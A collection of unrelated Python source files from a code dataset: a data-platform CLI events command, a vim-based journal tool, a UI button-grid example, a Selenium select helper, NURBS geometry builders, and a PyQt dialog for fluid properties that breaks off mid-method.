read_json(self.opt(\"file\"))\n self.log.info(f\"Putting event with payload: {payload}\")\n\n self.post_event_sdk.post_event(payload, dataset_id, version)\n data = {\n \"stream\": dataset_id,\n \"version\": version,\n \"source\": self.opt(\"file\") or \"stdin\",\n \"status\": \"Commited\",\n }\n out.add_row(data)\n self.print(\"Put event status\", out)\n\n def event_stat(self):\n dataset_id, version = self._resolve_dataset_uri()\n out = create_output(self.opt(\"format\"), \"events_stat_config.json\")\n\n data = self.esq_sdk.event_stat(dataset_id)\n if self.opt(\"format\") == \"json\":\n self.print(\"\", data)\n else:\n hour = data[\"last_hour\"]\n hour[\"timespan\"] = \"Last hour\"\n day = data[\"last_day\"]\n day[\"timespan\"] = \"Last day\"\n week = data[\"last_week\"]\n week[\"timespan\"] = \"Last week\"\n outdata = [hour, day, week]\n out.add_rows(outdata)\n self.print(f\"Events for {dataset_id}\", out)\n\n def _resolve_dataset_uri(self):\n dataset_uri = self.arg(\"dataset-uri\")\n uri_pattern = r\"\"\"\n ^ # beginning of string\n (?:ds:)? 
# match optional \"ds:\" prefix (non-capturing group)\n ([a-zA-Z0-9\\-]+) # match and capture dataset id; one or more characters in range a-z/A-Z/0-9, and \"-\"\n (?:\\/ # match optional dataset version (non-capturing group, exclude leading \"/\")\n ([1-9]|[1-9][0-9]+) # match and capture digits > 1 (if present)\n )?\n $ # end of string\n \"\"\"\n match = re.match(uri_pattern, dataset_uri, re.VERBOSE)\n\n if not match:\n raise ValueError(\n 'Invalid dataset URI, expects pattern \"[ds:][/]\"'\n )\n\n [dataset_id, version] = match.groups()\n\n version = version or \"1\"\n\n return dataset_id, version\n","sub_path":"okdata/cli/commands/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":8962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122183449","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\nimport os\nfrom sys import argv\nimport logging\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List\n\n\ndef prepend_filename_to_log(filename: Path or str, log_file: Path):\n if not log_file.exists():\n log_file.touch()\n with open(log_file, \"r+\") as f:\n lines = f.readlines()\n lines.insert(0, str(filename) + \"\\n\")\n f.writelines(lines)\n f.close()\n\n\ndef get_path_from_first_line_of_log(log_path) -> Path:\n if not log_path.exists():\n raise ValueError(\"log path '\" + str(log_path) + \"' doesn't exist\")\n with open(log_path, \"r\") as f:\n first_entry_string = f.read().splitlines()[0]\n return Path(first_entry_string)\n\n\ndef is_entry_path_existing(entry_path: Path or str, journal_dir: Path) -> bool:\n full_entry_path = Path(journal_dir / entry_path)\n return full_entry_path.exists()\n\n\ndef get_title_taken_message(title):\n return \"Sorry! The title \\\"\" + title + \"\\\" is already taken. 
:c\"\n\n\ndef get_vim_launch_command(journal_file):\n return 'vim + \"' + str(journal_file) + '\"'\n\n\ndef get_unique_title(journal_dir):\n title = input(\"Please provide a title or just say \\\"no\\\": \")\n if title == \"no\":\n return \"untitled\"\n new_entry = journal_dir / (title + \".txt\")\n if new_entry.exists():\n print(get_title_taken_message(title))\n return get_unique_title(journal_dir)\n if title == \"\":\n return get_unique_title(journal_dir)\n else:\n return title\n\n\ndef get_entries(journal_dir: Path, recursive: bool = False) -> List[Path]:\n if recursive:\n all_files: List[Path] = journal_dir.rglob(\"*\")\n hidden_files: List[Path] = journal_dir.rglob(\".*\")\n else:\n all_files: List[Path] = journal_dir.glob(\"*\")\n hidden_files: List[Path] = journal_dir.glob(\".*\")\n return [file for file in all_files if not any(\n file == hfile for hfile in hidden_files) and not file.is_dir()]\n\n\ndef get_entries_with_phrase_in_body(\n journal_dir: Path,\n phrase: str,\n recursive: bool = False) -> list:\n print(\"Printing journal files containing the phrase \\\"\" + phrase + \"\\\"\")\n if recursive:\n journal_entries = get_entries(journal_dir, recursive=True)\n else:\n journal_entries = get_entries(journal_dir)\n return [entry for entry in journal_entries if entry.read_text().find(phrase) != -1]\n\n\ndef get_list_of_entries_with_name_containing(\n journal_dir: Path,\n search_str: str,\n search_archives=False):\n if search_archives:\n matched_paths = journal_dir.rglob(\"*\" + search_str + \"*\")\n else:\n matched_paths = journal_dir.glob(\"*\" + search_str + \"*\")\n return [path for path in matched_paths if not path.is_dir()]\n\n\ndef main(\n journal_dir=Path.home() /\n \"Documents/journal\",\n log_file=Path.home() /\n \".jlv\"):\n\n no_flags_given = True\n title = \"untitled\"\n\n for index, arg in enumerate(argv):\n if arg[0:6] == \"--log=\":\n log_level = arg[6:]\n level_num = getattr(logging, log_level.upper())\n if not isinstance(level_num, int):\n raise ValueError('Invalid log level: %s' % log_level)\n logging.basicConfig(\n format='%(levelname)s:%(message)s',\n level=level_num)\n logging.info(\"custom logging level given: \" + log_level)\n if log_level.upper() == \"INFO\":\n journal_dir = Path(\"/tmp\")\n log_file = Path(\"/tmp/.jlv\")\n logging.info(\"argv = \" + str(argv))\n no_flags_given = False\n if arg == \"-t\":\n title = argv[index + 1]\n no_flags_given = False\n if arg == \"-p\":\n entry_location = get_path_from_first_line_of_log(log_file)\n entry_path = journal_dir / entry_location\n command = get_vim_launch_command(entry_path)\n os.system(command)\n exit(0)\n if arg == \"-s\":\n logging.info(\"index = \" + str(index) + \"\\nargv = \" + str(argv))\n matched_entries = get_entries_with_phrase_in_body(\n journal_dir, argv[index + 1])\n print(\"\\n\".join(str(entry) for entry in matched_entries))\n exit(0)\n if arg == \"-l\":\n entries = get_entries(journal_dir)\n print(\"\\n\".join(str(entry) for entry in entries))\n exit(0)\n if arg == \"-o\":\n search_string = argv[index + 1]\n possible_entry_paths = get_list_of_entries_with_name_containing(\n journal_dir, search_string)\n for entry_path in possible_entry_paths:\n response = \"\"\n while response != \"y\" and response != \"n\":\n print(\"Open \" + str(entry_path) + \"? 
(y/n)\")\n response = input()\n if response == \"y\":\n command = get_vim_launch_command(entry_path)\n os.system(command)\n break\n exit(0)\n\n logging.info(\"jlv starting...\")\n\n d = datetime.now().isoformat(sep='_', timespec='seconds')\n\n if no_flags_given and len(argv) > 1:\n title = argv[1]\n\n logging.info(\"title = \" + title)\n logging.info(\"journal directory: \" + str(journal_dir))\n\n if not journal_dir.is_dir():\n journal_dir.mkdir()\n logging.info(str(journal_dir) + \" directory was created\")\n else:\n logging.info(str(journal_dir) + \" directory was found\")\n\n if title != \"untitled\":\n # can't have forward slashes in the filename\n journal_file = journal_dir / (title.replace(\"/\", \"-\") + \".txt\")\n else:\n journal_file = journal_dir / (\"untitled_\" + d)\n\n if journal_file.is_file():\n print(get_title_taken_message(title))\n title = get_unique_title(journal_dir)\n if title != \"untitled\":\n journal_file = journal_dir / (title + \".txt\")\n else:\n journal_file = journal_dir / (\"untitled_\" + d)\n\n logging.info(\"creating new journal file: \" + str(journal_file))\n journal_file.touch()\n with open(journal_file, \"w+\") as f:\n f.write(title + \"\\n\\ncreated \" + d + \"\\n\\n\\n\")\n\n command = get_vim_launch_command(journal_file)\n os.system(command)\n\n if title == \"untitled\":\n title = get_unique_title(journal_dir)\n if title != \"untitled\":\n new_journal_file = journal_dir / (title + \".txt\")\n journal_file.rename(new_journal_file)\n journal_file = new_journal_file\n with open(journal_file) as f:\n lines = f.readlines()\n lines[0] = title + \"\\n\"\n with open(journal_file, \"w\") as f:\n f.writelines(lines)\n\n prepend_filename_to_log(journal_file.relative_to(journal_dir), log_file)\n\n\n# TODO add -r (recent) functionality for printing out last 10 journal entries in format \"title.txt, date-stamp\"\n# TODO add -l (list) functionality for listing out all journal entries in\n# format \"title.txt, date-stamp\"\n\nif __name__ == '__main__':\n main()\n","sub_path":"build/lib/jlv/jlv.py","file_name":"jlv.py","file_ext":"py","file_size_in_byte":7081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"514298994","text":"# -*- coding: utf-8 -*-\n\nfrom visigoth import Diagram\nfrom visigoth.common import Button, ButtonGrid\n\nd = Diagram()\n\nbg = ButtonGrid()\nbg.addButton(0,1,Button(\"North Button\"))\nbg.addButton(1,0,Button(\"West Button\"))\nbg.addButton(1,1,Button(\"Centre Button\"),initially_selected=True)\nbg.addButton(1,2,Button(\"East Button\"))\nbg.addButton(2,1,Button(\"South Button\"))\n\nd.add(bg)\nhtml = d.draw(format=\"html\")\n\nf = open(\"example.html\", \"w\")\nf.write(html)\nf.close()\n","sub_path":"docs/src/common/buttongrid/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"23955548","text":"import random\n\nfrom src.python.framework.elements.base_element import BaseElement\n\n\nclass Select(BaseElement):\n\tdef __init__(self, locator=None, element=None):\n\t\tsuper().__init__(locator, element)\n\t\tself.current_option = None\n\n\tdef select_option(self, option):\n\t\titems_list = self.get_options()\n\t\tfor item in items_list:\n\t\t\tif item.get_attribute(\"label\") == option:\n\t\t\t\tself.current_option = option\n\t\t\t\titem.click()\n\t\t\t\tbreak\n\n\tdef get_options(self):\n\t\treturn self().find_elements_by_tag_name('option')\n\n\tdef 
select_random_option(self):\n\t\twhile True:\n\t\t\trand_val = random.choice(self.get_options()).get_attribute(\"label\")\n\t\t\tif 'Select' not in rand_val:\n\t\t\t\tbreak\n\t\tself.select_option(rand_val)\n","sub_path":"src/python/framework/elements/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"399183889","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\nfrom datatypes import SplineCurve\nfrom datatypes import SplineSurface\nfrom datatypes import SplineVolume\nfrom datatypes import NurbsCurve\nfrom datatypes import NurbsSurface\nfrom datatypes import NurbsVolume\n\n# ...\ndef make_line(origin=(0.,0.), end=(1.,0.)):\n knots = [0., 0., 1., 1.]\n degree = 1\n n = len(knots) - degree - 1\n\n P = np.zeros((n, 2))\n P[:, 0] = [origin[0], end[0]]\n P[:, 1] = [origin[1], end[1]]\n\n return SplineCurve(knots=knots, degree=degree, points=P)\n\ndef make_arc(center=(0.,0.), radius=1., angle=90.):\n if angle == 90.:\n knots = [0., 0., 0., 1., 1., 1.]\n degree = 2\n n = len(knots) - degree - 1\n\n P = np.zeros((n, 2))\n P[:, 0] = [1., 1., 0.]\n P[:, 1] = [0., 1., 1.]\n\n # weights\n s2 = 1./np.sqrt(2)\n W = np.zeros(n)\n W[:] = [1., s2, 1.]\n\n elif angle == 120.:\n knots = [0., 0., 0., 1., 1., 1.]\n degree = 2\n n = len(knots) - degree - 1\n\n P = np.zeros((n, 2))\n a = np.cos(np.pi/6.)\n P[:, 0] = [ a, 0., -a]\n P[:, 1] = [.5, 2., .5]\n\n # weights\n W = np.zeros(n)\n W[:] = [1., 1./2., 1.]\n\n elif angle == 180.:\n knots = [0., 0., 0., 0., 1., 1., 1., 1.]\n degree = 3\n n = len(knots) - degree - 1\n\n P = np.zeros((n, 2))\n P[:, 0] = [1., 1., -1., -1.]\n P[:, 1] = [0., 2., 2., 0.]\n\n # weights\n W = np.zeros(n)\n W[:] = [1., 1./3., 1./3., 1.]\n\n else:\n raise NotImplementedError('TODO, given {}'.format(angle))\n\n P *= radius\n P[:,0] += center[0]\n P[:,1] += center[1]\n\n return NurbsCurve(knots=knots, degree=degree, points=P, weights=W)\n\ndef make_square(origin=(0,0), length=1.):\n Tu = [0., 0., 1., 1.]\n Tv = [0., 0., 1., 1.]\n pu = 1\n pv = 1\n nu = len(Tu) - pu - 1\n nv = len(Tv) - pv - 1\n gridu = np.unique(Tu)\n gridv = np.unique(Tv)\n\n origin = np.asarray(origin)\n\n P = np.asarray([[[0.,0.],[0.,1.]],[[1.,0.],[1.,1.]]])\n for i in range(0, 2):\n for j in range(0, 2):\n P[i,j,:] = origin + P[i,j,:]*length\n\n return SplineSurface(knots=(Tu, Tv), degree=(pu, pv), points=P)\n\ndef make_circle(center=(0.,0.), radius=1.):\n Tu = [0., 0., 0., 1, 1., 1.]\n Tv = [0., 0., 0., 1, 1., 1.]\n pu = 2\n pv = 2\n nu = len(Tu) - pu - 1\n nv = len(Tv) - pv - 1\n gridu = np.unique(Tu)\n gridv = np.unique(Tv)\n\n\n s = 1./np.sqrt(2)\n P = np.zeros((nu,nv,2))\n P[0,0,:] = np.asarray([-s , -s ])\n P[1,0,:] = np.asarray([-2*s , 0. ])\n P[2,0,:] = np.asarray([-s , s ])\n P[0,1,:] = np.asarray([0. , -2*s ])\n P[1,1,:] = np.asarray([0. , 0.0 ])\n P[2,1,:] = np.asarray([0. , 2*s ])\n P[0,2,:] = np.asarray([s , -s ])\n P[1,2,:] = np.asarray([2*s , 0. 
])\n P[2,2,:] = np.asarray([s , s ])\n\n P *= radius\n P[:,:,0] += center[0]\n P[:,:,1] += center[1]\n\n W = np.zeros((3,3))\n W[0,0] = 1.\n W[1,0] = s\n W[2,0] = 1.\n W[0,1] = s\n W[1,1] = 1.\n W[2,1] = s\n W[0,2] = 1.\n W[1,2] = s\n W[2,2] = 1.\n\n return NurbsSurface(knots=(Tu, Tv), degree=(pu, pv), points=P, weights=W)\n# ...\n\ndef make_half_annulus_cubic(center=(0.,0.), rmax=1., rmin=0.5):\n Tu = [0., 0., 0., 0., 1., 1., 1., 1.]\n Tv = [0., 0., 1., 1.]\n\n pu = 3\n pv = 1\n nu = len(Tu) - pu - 1\n nv = len(Tv) - pv - 1\n gridu = np.unique(Tu)\n gridv = np.unique(Tv)\n\n # ctrl points for radius = 1\n x = np.asarray([1., 1., -1., -1.])\n y = np.asarray([0., 2., 2., 0.])\n\n P = np.zeros((nu,nv,2))\n P[:, 0, 0] = rmax * x\n P[:, 0, 1] = rmax * y\n\n P[:, 1, 0] = rmin * x\n P[:, 1, 1] = rmin * y\n\n P[:,:,0] += center[0]\n P[:,:,1] += center[1]\n\n # weights\n W = np.zeros((nu,nv))\n W[:,0] = [1., 1./3., 1./3., 1.]\n W[:,1] = [1., 1./3., 1./3., 1.]\n\n return NurbsSurface(knots=(Tu, Tv), degree=(pu, pv), points=P, weights=W)\n\ndef make_L_shape_C1(center=None):\n Tu = [0., 0., 0., 0.5, 1., 1., 1.]\n Tv = [0., 0., 0., 1., 1., 1.]\n\n pu = 2\n pv = 2\n nu = len(Tu) - pu - 1\n nv = len(Tv) - pv - 1\n gridu = np.unique(Tu)\n gridv = np.unique(Tv)\n\n # ctrl points\n P = np.zeros((nu,nv,2))\n P[:,:,0] = np.asarray([[-1., -0.5, 0.], [-1., -0.707106781186548, 0.], [-1., -0.292893218813452, 0.], [1., 1., 1.]])\n P[:,:,1] = np.asarray([[-1., -1., -1.], [ 1., 0.292893218813452, 0.], [ 1., 0.707106781186548, 0.], [1., .5, 0.]])\n\n if not( center is None ):\n P[:,:,0] += center[0]\n P[:,:,1] += center[1]\n\n return SplineSurface(knots=(Tu, Tv), degree=(pu, pv), points=P)\n","sub_path":"cad/gallery.py","file_name":"gallery.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"239755929","text":"from PyQt5.QtWidgets import QLineEdit, QDialog, QTreeWidget, QRadioButton, QMessageBox, QTreeWidgetItem, QPushButton, QTabWidget, QHeaderView\nfrom PyQt5.QtGui import QIcon, QColor, QBrush, QFont\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import uic\nimport configparser\nfrom time import time\n\nfrom pulse.preprocessing.fluid import Fluid\nfrom pulse.default_libraries import default_fluid_library\nfrom data.user_input.project.printMessageInput import PrintMessageInput\n\nwindow_title1 = \"ERROR MESSAGE\"\nwindow_title2 = \"WARNING MESSAGE\"\n\n\ndef getColorRGB(color):\n temp = color[1:-1]\n tokens = temp.split(',')\n return list(map(int, tokens))\n\nclass FluidInput(QDialog):\n def __init__(self, project, opv, *args, **kwargs):\n super().__init__(*args, **kwargs)\n uic.loadUi('data/user_input/ui/Model/Setup/Acoustic/fluidlnput.ui', self)\n \n icons_path = 'data\\\\icons\\\\'\n self.icon = QIcon(icons_path + 'pulse.png')\n self.setWindowIcon(self.icon)\n\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.setWindowModality(Qt.WindowModal)\n\n self.opv = opv\n self.opv.setInputObject(self)\n self.lines_ids = opv.getListPickedEntities()\n\n self.project = project\n self.preprocessor = project.preprocessor\n self.before_run = self.preprocessor.get_model_checks()\n\n self.fluid_path = project.get_fluid_list_path()\n\n self.dict_tag_to_entity = self.project.preprocessor.dict_tag_to_entity\n self.clicked_item = None\n self.fluid = None\n self.flagAll = False\n self.flagSelection = False\n\n self.adding = False\n self.editing = False\n self.temp_fluid_color = \"\"\n\n self.treeWidget_fluids = self.findChild(QTreeWidget, 
'treeWidget_fluids')\n header = self.treeWidget_fluids.headerItem()\n \n fnt = QFont()\n fnt.setPointSize(11)\n fnt.setBold(True)\n # fnt.setItalic(True)\n fnt.setFamily(\"Arial\")\n\n for col_index, width in enumerate([140, 50, 80, 170, 180, 172]):\n self.treeWidget_fluids.setColumnWidth(col_index, width)\n header.setFont(col_index, fnt)\n # header.setBackground(col_index, QBrush(QColor(200, 200, 200)))\n # header.setForeground(col_index, QBrush(QColor(200, 200, 200)))\n for col_index in [6,7,8,9]:\n self.treeWidget_fluids.hideColumn(col_index)\n #\n self.treeWidget_fluids.itemClicked.connect(self.on_click_item)\n self.treeWidget_fluids.itemDoubleClicked.connect(self.on_doubleclick_item)\n #\n self.lineEdit_name = self.findChild(QLineEdit, 'lineEdit_name')\n self.lineEdit_id = self.findChild(QLineEdit, 'lineEdit_id')\n self.lineEdit_color = self.findChild(QLineEdit, 'lineEdit_color')\n self.lineEdit_fluid_density = self.findChild(QLineEdit, 'lineEdit_fluid_density')\n self.lineEdit_speed_of_sound = self.findChild(QLineEdit, 'lineEdit_speed_of_sound')\n self.lineEdit_impedance = self.findChild(QLineEdit, 'lineEdit_impedance')\n self.lineEdit_isentropic_exponent = self.findChild(QLineEdit, 'lineEdit_isentropic_exponent')\n self.lineEdit_thermal_conductivity = self.findChild(QLineEdit, 'lineEdit_thermal_conductivity')\n self.lineEdit_specific_heat_Cp = self.findChild(QLineEdit, 'lineEdit_specific_heat_Cp')\n self.lineEdit_dynamic_viscosity = self.findChild(QLineEdit, 'lineEdit_dynamic_viscosity')\n #\n self.lineEdit_name_edit = self.findChild(QLineEdit, 'lineEdit_name_edit')\n self.lineEdit_id_edit = self.findChild(QLineEdit, 'lineEdit_id_edit')\n self.lineEdit_color_edit = self.findChild(QLineEdit, 'lineEdit_color_edit')\n self.lineEdit_fluid_density_edit = self.findChild(QLineEdit, 'lineEdit_fluid_density_edit')\n self.lineEdit_speed_of_sound_edit = self.findChild(QLineEdit, 'lineEdit_speed_of_sound_edit')\n self.lineEdit_impedance_edit = self.findChild(QLineEdit, 'lineEdit_impedance_edit')\n self.lineEdit_isentropic_exponent_edit = self.findChild(QLineEdit, 'lineEdit_isentropic_exponent_edit')\n self.lineEdit_thermal_conductivity_edit = self.findChild(QLineEdit, 'lineEdit_thermal_conductivity_edit')\n self.lineEdit_specific_heat_Cp_edit = self.findChild(QLineEdit, 'lineEdit_specific_heat_Cp_edit')\n self.lineEdit_dynamic_viscosity_edit = self.findChild(QLineEdit, 'lineEdit_dynamic_viscosity_edit')\n # \n self.lineEdit_name_remove = self.findChild(QLineEdit, 'lineEdit_name_remove')\n self.lineEdit_id_remove = self.findChild(QLineEdit, 'lineEdit_id_remove')\n self.lineEdit_color_remove = self.findChild(QLineEdit, 'lineEdit_color_remove')\n self.lineEdit_fluid_density_remove = self.findChild(QLineEdit, 'lineEdit_fluid_density_remove')\n self.lineEdit_speed_of_sound_remove = self.findChild(QLineEdit, 'lineEdit_speed_of_sound_remove')\n self.lineEdit_impedance_remove = self.findChild(QLineEdit, 'lineEdit_impedance_remove')\n self.lineEdit_isentropic_exponent_remove = self.findChild(QLineEdit, 'lineEdit_isentropic_exponent_remove')\n self.lineEdit_thermal_conductivity_remove = self.findChild(QLineEdit, 'lineEdit_thermal_conductivity_remove')\n self.lineEdit_specific_heat_Cp_remove = self.findChild(QLineEdit, 'lineEdit_specific_heat_Cp_remove')\n self.lineEdit_dynamic_viscosity_remove = self.findChild(QLineEdit, 'lineEdit_dynamic_viscosity_remove') \n #\n self.create_lists_of_lineEdit()\n\n self.radioButton_all = self.findChild(QRadioButton, 'radioButton_all')\n self.radioButton_selected_lines = 
self.findChild(QRadioButton, 'radioButton_selected_lines')\n self.radioButton_all.toggled.connect(self.radioButtonEvent)\n self.radioButton_selected_lines.toggled.connect(self.radioButtonEvent)\n\n self.lineEdit_selected_ID = self.findChild(QLineEdit, 'lineEdit_selected_ID')\n\n if self.lines_ids != []:\n self.write_lines(self.lines_ids)\n self.radioButton_selected_lines.setChecked(True)\n else:\n self.lineEdit_selected_ID.setText(\"All lines\")\n self.lineEdit_selected_ID.setEnabled(False)\n self.radioButton_all.setChecked(True)\n\n self.pushButton_confirm = self.findChild(QPushButton, 'pushButton_confirm')\n self.pushButton_confirm.clicked.connect(self.confirm_fluid_attribution)\n\n self.pushButton_confirm_add_fluid = self.findChild(QPushButton, 'pushButton_confirm_add_fluid')\n self.pushButton_confirm_add_fluid.clicked.connect(self.check_add_fluid)\n\n self.pushButton_reset_entries_add_fluid = self.findChild(QPushButton, 'pushButton_reset_entries_add_fluid')\n self.pushButton_reset_entries_add_fluid.clicked.connect(self.reset_add_texts)\n\n self.pushButton_confirm_fluid_edition = self.findChild(QPushButton, 'pushButton_confirm_fluid_edition')\n self.pushButton_confirm_fluid_edition.clicked.connect(self.check_edit_fluid)\n\n self.pushButton_confirm_fluid_removal = self.findChild(QPushButton, 'pushButton_confirm_fluid_removal')\n self.pushButton_confirm_fluid_removal.clicked.connect(self.confirm_fluid_removal)\n\n self.pushButton_reset_library = self.findChild(QPushButton, 'pushButton_reset_library')\n self.pushButton_reset_library.clicked.connect(self.reset_library_to_default)\n\n self.tabWidget_fluid = self.findChild(QTabWidget, 'tabWidget_fluid')\n # self.tabWidget_fluid.currentChanged.connect(self.tab_event_update)\n \n self.flagAll = self.radioButton_all.isChecked()\n self.flagSelection = self.radioButton_selected_lines.isChecked()\n\n self.loadList()\n self.exec_()\n\n # def tab_event_update(self):\n # self.reset_add_texts()\n # self.reset_edit_texts()\n # self.reset_remove_texts()\n\n def update(self):\n self.lines_ids = self.opv.getListPickedEntities()\n if self.lines_ids != []:\n self.write_lines(self.lines_ids)\n self.radioButton_selected_lines.setChecked(True)\n self.lineEdit_selected_ID.setEnabled(True)\n else:\n self.lineEdit_selected_ID.setText(\"All lines\")\n self.radioButton_all.setChecked(True)\n self.lineEdit_selected_ID.setEnabled(False)\n\n def write_lines(self, list_node_ids):\n text = \"\"\n for node in list_node_ids:\n text += \"{}, \".format(node)\n self.lineEdit_selected_ID.setText(text)\n\n def create_lists_of_lineEdit(self):\n self.list_add_lineEdit = [ self.lineEdit_name,\n self.lineEdit_id,\n self.lineEdit_color,\n self.lineEdit_fluid_density,\n self.lineEdit_speed_of_sound,\n self.lineEdit_impedance,\n self.lineEdit_isentropic_exponent,\n self.lineEdit_thermal_conductivity,\n self.lineEdit_specific_heat_Cp,\n self.lineEdit_dynamic_viscosity ] \n\n self.list_edit_lineEdit = [ self.lineEdit_name_edit,\n self.lineEdit_id_edit,\n self.lineEdit_color_edit,\n self.lineEdit_fluid_density_edit,\n self.lineEdit_speed_of_sound_edit,\n self.lineEdit_impedance_edit,\n self.lineEdit_isentropic_exponent_edit,\n self.lineEdit_thermal_conductivity_edit,\n self.lineEdit_specific_heat_Cp_edit,\n self.lineEdit_dynamic_viscosity_edit ] \n \n self.list_remove_lineEdit = [ self.lineEdit_name_remove,\n self.lineEdit_id_remove,\n self.lineEdit_color_remove,\n self.lineEdit_fluid_density_remove,\n self.lineEdit_speed_of_sound_remove,\n self.lineEdit_impedance_remove,\n 
self.lineEdit_isentropic_exponent_remove,\n self.lineEdit_thermal_conductivity_remove,\n self.lineEdit_specific_heat_Cp_remove,\n self.lineEdit_dynamic_viscosity_remove ] \n\n def keyPressEvent(self, event):\n if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:\n self.confirm_fluid_attribution()\n elif event.key() == Qt.Key_Escape:\n self.close() \n\n def check_input_name(self, name_string):\n if name_string == \"\":\n title = 'Empty fluid name'\n message = \"Please, insert a valid fluid name.\"\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n if self.adding:\n if name_string in self.list_names:\n title = 'Invalid fluid name'\n message = \"Please, inform a different fluid name. It is already being used by other fluid!\"\n PrintMessageInput([title, message, window_title1])\n return True\n self.dict_inputs['name'] = name_string\n \n def check_input_fluid_id(self, id_string):\n if id_string == \"\":\n title = 'Empty fluid ID'\n message = \"Please, insert a valid fluid ID.\"\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n try:\n self.fluid_id = int(id_string)\n if self.adding:\n if self.fluid_id in self.list_ids:\n title = 'Invalid fluid name'\n message = \"Please, inform a different fluid ID. It is already being used by other fluid.\"\n PrintMessageInput([title, message, window_title1])\n return True\n \n except Exception as err:\n title = \"Invalid fluid ID\"\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n return True\n self.dict_inputs['identifier'] = id_string\n \n def check_input_color(self, color_string):\n if color_string == \"\":\n title = 'Empty [r,g,b] color'\n message = \"Please, insert a valid [r,g,b] color to the fluid.\"\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n \n message = \" Invalid color RGB input! 
You must input: [value1, value2, value3] \\nand the values must be inside [0, 255] interval.\"\n try:\n self.colorRGB = getColorRGB(color_string)\n message_color = (\" The RGB color {} was already used.\\n Please, input a different color.\").format(self.colorRGB)\n\n if len(self.colorRGB)!=3:\n title = 'Invalid [r,g,b] color'\n PrintMessageInput([title, message, window_title1])\n return True\n\n if self.editing:\n temp_colorRGB = getColorRGB(self.temp_fluid_color)\n if temp_colorRGB != self.colorRGB:\n if self.colorRGB in self.list_colors:\n title = 'Invalid [r,g,b] color'\n PrintMessageInput([title, message_color, window_title1])\n return True \n else:\n self.list_colors.remove(temp_colorRGB)\n \n elif self.adding:\n if self.colorRGB in self.list_colors:\n title = 'Invalid [r,g,b] color'\n PrintMessageInput([title, message_color, window_title1])\n return True\n\n except Exception as err:\n title = 'Invalid [r,g,b] color'\n message = str(err)\n PrintMessageInput([title, message, window_title1])\n return True\n self.dict_inputs['color'] = color_string\n \n def check_element_type_of_lines(self):\n\n self.flag_all_fluid_inputs = False\n\n if self.flagSelection:\n \n lineEdit = self.lineEdit_selected_ID.text()\n self.stop, self.lines_typed = self.before_run.check_input_LineID(lineEdit)\n if self.stop:\n return True\n\n for line in self.lines_typed:\n _line = self.dict_tag_to_entity[line]\n if _line.acoustic_element_type in ['wide-duct', 'LRF fluid equivalent', 'LRF full']:\n self.flag_all_fluid_inputs = True \n break\n \n elif self.flagAll:\n for line in self.project.preprocessor.all_lines:\n _line = self.dict_tag_to_entity[line]\n if _line.acoustic_element_type in ['wide-duct', 'LRF fluid equivalent', 'LRF full']:\n self.flag_all_fluid_inputs = True\n break\n \n return False\n\n def check_input_parameters(self, input_string, label, _float=True):\n title = \"INPUT ERROR\"\n value_string = input_string\n if value_string != \"\":\n try:\n if _float:\n value = float(value_string)\n else:\n value = int(value_string) \n if value < 0:\n message = \"You cannot input a negative value to the {}.\".format(label)\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n self.value = value\n except Exception:\n message = \"You have typed an invalid value to the {}.\".format(label)\n PrintMessageInput([title, message, window_title1])\n return True\n else:\n self.value = None\n return False\n\n def check_all_inputs(self):\n\n self.incomplete_inputs = False\n\n if self.check_input_parameters(self.fluid_density_string, 'fluid density'):\n return True\n else:\n fluid_density = self.value\n if fluid_density > 2000:\n title = \"Invalid density value\"\n message = \"The input value for fluid density must be a positive number less than 2000.\"\n PrintMessageInput([title, message, window_title1])\n return False\n self.dict_inputs['fluid density'] = fluid_density\n\n if self.check_input_parameters(self.speed_of_sound_string, 'speed of sound'):\n return True\n else:\n speed_of_sound = self.value\n self.dict_inputs['speed of sound'] = speed_of_sound\n\n impedance = fluid_density*speed_of_sound\n impedance_string = str(fluid_density*speed_of_sound)\n if self.adding:\n self.lineEdit_impedance.setText(impedance_string)\n elif self.editing:\n self.lineEdit_impedance_edit.setText(impedance_string)\n self.dict_inputs['impedance'] = impedance\n \n self.list_empty_inputs = []\n\n if self.isentropic_exponent_string != \"\": \n if self.check_input_parameters(self.isentropic_exponent_string, 'isentropic 
exponent'):\n return True\n else:\n isentropic_exponent = self.value\n self.dict_inputs['isentropic exponent'] = isentropic_exponent\n else:\n self.list_empty_inputs.append('isentropic exponent')\n self.incomplete_inputs = True\n\n if self.thermal_conductivity_string != \"\": \n if self.check_input_parameters(self.thermal_conductivity_string, 'thermal conductivity'):\n return True\n else:\n thermal_conductivity = self.value \n self.dict_inputs['thermal conductivity'] = thermal_conductivity\n else:\n self.list_empty_inputs.append('thermal conductivity')\n self.incomplete_inputs = True\n\n if self.specific_heat_Cp_string != \"\":\n if self.check_input_parameters(self.specific_heat_Cp_string, 'specific heat Cp'):\n return True\n else:\n specific_heat_Cp = self.value \n self.dict_inputs['specific heat Cp'] = specific_heat_Cp\n else:\n self.list_empty_inputs.append('specific heat Cp')\n self.incomplete_inputs = True\n\n if self.dynamic_viscosity_string != \"\": \n if self.check_input_parameters(self.dynamic_viscosity_string, 'dynamic viscosity'):\n return True\n else:\n dynamic_viscosity = self.value \n self.dict_inputs['dynamic viscosity'] = dynamic_viscosity\n else:\n self.list_empty_inputs.append('dynamic viscosity')\n self.incomplete_inputs = True\n \n if self.incomplete_inputs:\n self.all_fluid_properties_message()\n\n def check_add_edit(self, 